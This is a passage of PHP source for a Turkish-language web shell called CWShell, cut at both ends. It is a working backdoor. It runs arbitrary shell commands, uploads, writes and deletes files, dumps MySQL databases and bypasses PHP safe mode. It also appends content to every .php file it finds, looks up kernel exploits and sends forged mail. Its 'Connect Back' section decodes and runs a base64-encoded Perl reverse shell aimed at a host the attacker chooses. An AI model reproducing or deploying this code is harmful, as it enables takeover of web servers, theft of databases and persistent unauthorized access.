KAPALI"; } else { $safemode = "ACIK"; } $dir = @realpath($_POST['dir']); $mkdir = @$_POST['makedir']; $mydir = @$_POST['deletedir']; $cmd = @$_GET['cmd']; $host = @$_POST['host']; $proto = @$_POST['protocol']; $delete = @$_POST['delete']; $phpeval = @$_POST['php_eval']; $db = @$_POST['db']; $query = @$_POST['query']; $user = @$_POST['user']; $pass = @$_POST['passd']; $myports = array("21","22","23","25","59","80","113","135","445","1025","5000","5900","6660","6661","6662","6663","6665","6666","6667","6668","6669","7000","8080","8018"); $quotes = get_magic_quotes_gpc(); if ($quotes == "1" or $quotes == "on") { $quot = "ACIK"; } else { $quot = "KAPALI"; } // Perms function getperms($fn) { $mode=fileperms($fn); $perms=''; $perms .= ($mode & 00400) ? 'r' : '-'; $perms .= ($mode & 00200) ? 'w' : '-'; $perms .= ($mode & 00100) ? 'x' : '-'; $perms .= ($mode & 00040) ? 'r' : '-'; $perms .= ($mode & 00020) ? 'w' : '-'; $perms .= ($mode & 00010) ? 'x' : '-'; $perms .= ($mode & 00004) ? 'r' : '-'; $perms .= ($mode & 00002) ? 'w' : '-'; $perms .= ($mode & 00001) ? 'x' : '-'; return $perms; } // milw0rm Search (locushell) $Lversion = @php_uname('r'); $OSV = @php_uname('s'); if(eregi('Linux',$OSV)) { $Lversion=substr($Lversion,0,6); $millink="http://milw0rm.com/search.php?dong=Linux Kernel".$Lversion; }else{ $Lversion=substr($Lversion,0,3); $millink="http://milw0rm.com/search.php?dong=".$OSV." ".$Lversion; } if(isset($_POST['milw0'])) { echo ""; } //Space $spacedir = @getcwd(); $free = @diskfreespace($spacedir); if (!$free) {$free = 0;} $all = @disk_total_space($spacedir); if (!$all) {$all = 0;} function view_size($size) { if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";} elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";} elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";} else {$size = $size . " B";} return $size; } $percentfree = intval(($free*100)/$all); // PHPinfo if(isset($_POST['phpinfo'])) { die(phpinfo()); } // Make File $name = htmlspecialchars(@$_POST['names']); $src = @$_POST['source']; if(isset($name) && isset($src)) { if($_POST['darezz'] != realpath(".")) { $name = $_POST['darezz'].$name; } $ctd = fopen($name,"w+"); fwrite($ctd, $src); fclose($ctd); echo ""; } // Upload File $path = @$_FILES['ffile']['tmp_name']; $name = @$_FILES['ffile']['name']; if(isset($path) && isset($name)) { if($_POST['dare'] != realpath(".")) { $name = $_POST['dare'].$name; } if(move_uploaded_file($path, $name)) { echo ""; } else { echo ""; } } // Delete File if(isset($delete) && $delete != $dir) { if(file_exists($delete)) { unlink($delete); echo ""; } } // Database if(isset($db) && isset($query) && isset($_POST['godb'])) { $mysql = mysql_connect("localhost", $user, $pass)or die(""); $db = mysql_select_db($db)or die(mysql_error()); $queryz = mysql_query($query)or die(mysql_error()); if($query) { echo ""; } else { echo ""; } } // Dump Database [pacucci.com] if(isset($_POST['dump']) && isset($user) && isset($pass) && isset($db)){ mysql_connect('localhost', $user, $pass); mysql_select_db($db); $tables = mysql_list_tables($db); while ($td = mysql_fetch_array($tables)) { $table = $td[0]; $r = mysql_query("SHOW CREATE TABLE `$table`"); if ($r) { $insert_sql = ""; $d = mysql_fetch_array($r); $d[1] .= ";"; $SQL[] = str_replace("\n", "", $d[1]); $table_query = mysql_query("SELECT * FROM `$table`"); $num_fields = mysql_num_fields($table_query); while ($fetch_row = mysql_fetch_array($table_query)) { $insert_sql .= "INSERT INTO $table VALUES("; for ($n=1;$n<=$num_fields;$n++) { $m = $n - 1; $insert_sql .= "'".mysql_real_escape_string($fetch_row[$m])."', "; } $insert_sql = substr($insert_sql,0,-2); $insert_sql .= ");\n"; } if ($insert_sql!= "") { $SQL[] = $insert_sql; } } } $dump = "-- Database: ".$_POST['db'] ." \n"; $dump .= "-- CWShellDumper v3\n"; $dump .= "-- r57.biz\n"; $dumpp = $dump.implode("\r", $SQL); $name = $db."-".date("d-m-y")."cyberwarrior.sql"; Header("Content-type: application/octet-stream"); Header("Content-Disposition: attachment; filename = $name"); echo $dumpp; die(); } // Make Dir if(isset($mkdir)) { mkdir($mkdir); if($mkdir) { echo ""; } } // Delete Directory if(isset($mydir) && $mydir != "$dir") { $d = dir($mydir); while($entry = $d->read()) { if ($entry !== "." && $entry !== "..") { unlink($entry); } } $d->close(); rmdir($mydir); } //Infect Files [RFI] if(isset($_POST['inf3ct'])) { foreach (glob("*.php") as $lola) { $dira = '.'; $asdi = fopen($lola, 'a+'); @fwrite($asdi, ' '); @fclose($asdi); } if($asdi) { $textzz = 'Oldu:
?pwn=[shell]'; } else { $textzz = 'HATA! (Permlere Dikkat Et..)'; } } //Infect Files [Eval] if(isset($_POST['evalinfect'])) { foreach (glob("*.php") as $lal) { $dira = '.'; $axd = fopen($lal, 'a+'); @fwrite($axd, ' '); @fclose($axd); } if($axd) { $textz0 = 'Oldu:
?eval=[eval]'; } else { $textz0 = 'HATA! (Permler IZIn Vermior..)'; } } // Images if(@$_GET['com'] == "image") { $images = array( "folder"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABmJLR0QAAAAAAAD5Q7t/AAAACXBIWXMAAA3XAAAN1wFCKJt4AAAAB3RJTUUH1QsKEjkN+d1wUAAAAX9JREFUOMulkU2IUlEYhp9jKv5AposQWgRBtA6CmSCa5SzjYhG0qYggiP6Y3WxmtrMIol1QM84qRKRlSVC2bBcYRpuIIigFC7F7j0fP/WZx7QriBc2XDw6cw/e8L+9Rly6XtorF4jZTMsYE58Dc2tvdf0KE1J17t+X61RszH7X2eLb3lF6vd6VaqT2PBJSci7Q+taJMeNt4M331qFqpPQCIA6TTGY7k8pEA50IpcFMKpRS1F9X7QAAwxuB5Lq8/9ml2Msylww5nbjpSSOnPYYJmJ8PjjXW0sXMxUslD3H1YPxUH8DwXgJ+/NV/af+cCnDiaBSCmtSadnjP6DMVc1w0T/BfgXwdLARZNYK2PHgZlh7+QiPkIICIopRARRMAXwVphaH3MSBiMLEMr5LLJCcDzXI7nBnT7hh9dD0ThI4wHERAEkTEYGFmZAH512pw+e44PX/+MlwJ3EfARBAUiYaqVkwXqL1+R19/L6vy1nYabOLa2aHnZ4bf378qbqyyrA8KHtMqnsOL4AAAAAElFTkSuQmCC", "file"=> "iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAYAAAAf8/9hAAAABGdBTUEAAK/INwWK6QAAABl0RVh0U29mdHdhcmUAQWRvYmUgSW1hZ2VSZWFkeXHJZTwAAAP3SURBVHjaYtxx5BYDIwMUMDLESIjyTeRiZ2H4//8/WOgvEP/69Zfh5+9/DI8ev3jx9NGDKAYmpovc/MIMc6e0MwAEEAszEyPDP6h+pn9/ORWkBYV4OVlhRjL8Bprz5etfhncfPjP8l5IQ4uVh33Lt2i1foAUXQPIAAcSirC3F8PoXI8N7JmaGrw9f//z67S8DCzMrAwvjPwZWVkYGpv+MDIxAJzIB5VlZGBgsjTRlWFiYN99//BpsCEAAsbCxsTCwMjEx/P3NZPmcSTB2/UNmBsb//xi+fv3DoCH8l8FFlZmBg4WVgZ2dleHHr98Ml27cY/jPwCzDxc23BejLQIAAAEEAvv8CAwH/APT1/l/l7P+/IRwHREEtBQAmJgIA+g4GAKHUBgCGufQA9fb1AAgFAwASEAwA9ff+AOjr8QAFBgob/Pz9YQKI6ePP/7qH7zBP5GJhYtfjZ2KQAnqfCehUoIUMnFzMDBuv8TAsOPSeAWgk0GvMDNxc7AxCvOwM4sI8QJf8/wsQQCzbb/9L/vGLgd9KkoHh03cGhku/GBhefmVg+AjEQHFgxDAzrDr4ncFK/jkDDxcfMDwYGbi4OBhYgF4HBs1/gABiOnf9p/mrT78ZXv9hYHj3m4Hh8hMGhquPGBgevmRgeP+NgeHP5+8Mty98ZLj++D0DK/N/Bm4OdmDA/mDg52QDxztAADG9fPyDb/eRDwzTjvxmAJrBYAx0yV+gzfeBBvz68pfh64PXDOxcrAx//4Jih4mBDRgVPDxAlwDZoNgBCCCmPz//Pn15+iXDiyufGF5+ANnAwMD66yfDzcNPGIS/vWb4+uITAycvE1icmQUYlaysDF8/vwMGKhM4nQAEENOz84t2i4mJMHiYcDNI8DMyCAJdZi4FjB9LVgZ9VW4GEWleBgWJHwxSQEOYgdH5H5jsRETFGf4D0wUorQIEENODQ5MWq2h9uSUty8EgJcDAIMfOwOCpy8FQkibOoKbOy+AaKMbgYfiRQVxEDOhkFgZmYJp58fwJMGj/AkOAkQEggFh+fHj54uLq1PhTurMXPXqkpsr5+QMDDzczA5cML8OzN58YBN+dY7DSEGLgFxJl+AUMh3///jDIysgDww/kgv8MAAHEDPLH19ePnpzcsmzLzduvFT4zKGucOP+M4ffnZwyKrI8ZbDVEGBSUNYDqgRr+/WdgAtL37txgEAZ6Y9XKlacAAogFlmn+fnt3X+bv6e0L6tr8P757B4yJvwzcvIIMbBycDH+Bnv0NzI3ADMHw5+8/Bg1dYwYmNmB+YWXlAAggRE4GxsnUeev09+zalvDsySOgwYzgDA2y9T/Df3juBDFBPBYWNsbbN86fBAgwAD3nU17W2F2kAAAAAElFTkSuQmCC", "floppy"=> "R0lGODlhECAQILMgIB8jVq2yyI0csGVuGcjL2v///9TY405WfqOmvjI+bHoaoQsMQxR+uubn7bu+0f///yH5BAEgIA8gLCAgICAQIBAgIAR/8CHEHlVq6HMZNEUYJGFZMiACFtxpCiBDHgLjEwogzLfZDAuBw0AsEn0eIAKocAR+E0Yls1koAn2skjLFDA7WQKlBJh6z4AEiVDZneDDFrNEwE95QRHwgaFOdSlx6CwcKdndOUQxxJgZgFgIYCjALCQN/eRUWIAsPIHggoSCdESA7" ); header("Content-type: image/gif"); header("Cache-control: public"); header("Expires: ".date("r",mktime(0,0,0,1,1,2030))); header("Cache-control: max-age=".(60*60*24*7)); header("Last-Modified: ".date("r",filemtime(__FILE__))); $image = $images[$_GET['img']]; echo base64_decode($image); } //File List chdir($dir); if(!isset($dir)) { $dir = @realpath("."); } if($dir != "/") { $dir = @realpath("."); } else { $dir = "."; } if (substr($dir,-1) != DIRECTORY_SEPARATOR) {$dir .= DIRECTORY_SEPARATOR;} $pahtw = 0; $filew = 0; $num = 1; if (is_dir($dir)) { if ($open = opendir($dir)) { if(is_dir($dir)) { $typezz = "DIR"; $pahtw++; } while (($list = readdir($open)) == true) { if(is_dir($list)) { $typezz = "DIR"; $pahtw++; @$listf.= '['.$list.']'.$typezz.'' . getperms($list) .''; } else { $lolz = filesize($list) / 1024; $lolx = intval($lolz); if($lolx == 0) { $lolx = 1; } $typezz = "DOSYA"; $filew++; $listz = "/".$list; if(eregi($page,$listz)) { @$listf.= ''.$list.''.$typezz.'' . $lolx .' Kb' . getperms($list) . ''; } elseif(eregi('config',$listz) && eregi('.php',$listz)) { @$listf.= ''.$list.''.$typezz.'' . $lolx .' Kb' . getperms($list) . ''; } else {@$listf.= ''.$list.''.$typezz.'' . $lolx .' Kb' . getperms($list) . ''; } } } closedir($open); } $fileq = $pahtw + $filew; } echo "
ü ~ CWShell ~ ü
"; // Safe Mode Bypass if(isset($_POST['safemodz'])) { echo "
Site: $site
Server Name: " . $_SERVER['SERVER_NAME'] . "
Server Bilgisi : $info
Uname -a: $uname
Klasör: " . $_SERVER['DOCUMENT_ROOT'] . "
Safe Mode: $safemode
Sihirli Sozler: $quot
Sayfa: $page
Boş Alan: " . view_size($free) . " [ $percentfree% ]
Toplam Alan: " . view_size($all) . "
IP: " . $_SERVER['REMOTE_ADDR'] ." - Server IP: ".$_SERVER['SERVER_ADDR']."
- - - - - - - -
Safe-Mode Bypass[Dosyalar]
 Dosya adı:

Safe-Mode Bypass [Klasörler]
 Klasör:
"; } // Safe Mode Bypass: File if(isset($_POST['redfi'])) { $test=''; $tempp= tempnam($test, "cx"); $get = htmlspecialchars($_POST['filew']); if(copy("compress.zlib://".$get, $tempp)){ $fopenzo = fopen($tempp, "r"); $freadz = fread($fopenzo, filesize($tempp)); fclose($fopenzo); $source = htmlspecialchars($freadz); echo "
$get
"; unlink($tempp); } else { echo "
HATA"; } } // Safe Mode Bypass: Directory if(isset($_POST['reddi'])){ function dirz() { $dirz = $_POST['directory']; $files = glob("$dirz*"); foreach ($files as $filename) { echo "
"; echo "$filename\n"; echo "
"; } } echo "
"; dirz(); } // Connect Back if(isset($_POST['connectback'])) { echo "
Back-Connect
 "; } if(isset($_POST['logeraser'])) { echo "
:: OS ::
"; } // Connect Back if(isset($_POST['connsub'])) { $sources = base64_decode("CiMhL3Vzci9iaW4vcGVybAp1c2UgU29ja2V0OwoKJGV4ZWN1dGU9J2VjaG8gIkhlcmUgaSBhbSI7ZWNobyAiYHVuYW1lIC1hYCI7ZWNobyAiYHVwdGltZWAiOy9iaW4vc2gnOwoKJHRhcmdldD0kQVJHVlswXTsKJHBvcnQ9JEFSR1ZbMV07CiRpYWRkcj1pbmV0X2F0b24oJHRhcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcGFkZHI9c29ja2FkZHJfaW4oJHBvcnQsICRpYWRkcikgfHwgZGllKCJFcnJvcjogJCFcbiIpOwokcHJvdG89Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOwpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7CmNvbm5lY3QoU09DS0VULCAkcGFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsKb3BlbihTVERJTiwgIj4mU09DS0VUIik7Cm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsKb3BlbihTVERFUlIsICI+JlNPQ0tFVCIpOwpzeXN0ZW0oJGV4ZWN1dGUpOwpjbG9zZShTVERJTik7CmNsb3NlKFNURE9VVCk7IA=="); $openz = fopen("cbs.pl", "w+")or die("Error"); fwrite($openz, $sources)or die("Error"); fclose($openz); $aids = passthru("perl cbs.pl ".$_POST['connhost']." ".$_POST['connport']); unlink("cbs.pl"); } if(isset($_POST['connsub'])) { echo "Done."; } // Logs Eraser if(isset($_POST['runer'])) { echo "
"; } if(isset($_POST['commex'])) { echo "
CMD :]
"; } if(isset($_POST['cmdex'])) { echo ""; switch (@$_POST['functionz']) { case "system": system(stripslashes($_POST['cmd'])); break; case "popen": $handle = popen($_POST['cmd'].' 2>&1', 'r'); echo "'$handle'; " . gettype($handle) . "\n"; $read = fread($handle, 2096); echo $read; pclose($handle); break; case "shell_exec": shell_exec(stripslashes($_POST['cmd'])); break; case "exec": exec(stripslashes($_POST['cmd'])); break; case "passthru": passthru(stripslashes($_POST['cmd'])); } } elseif(isset($_POST['mail'])) { echo "
FakeMail [HTML Onaylı]
Kime:

Kimden:

Konu:

Mesaj:



";} if(isset($_POST['senm'])) { //Mail With HTML <- webcheatsheet.com $to = $_POST['mto']; $subject = $_POST['mobj']; $contentz = $_POST['mtext']."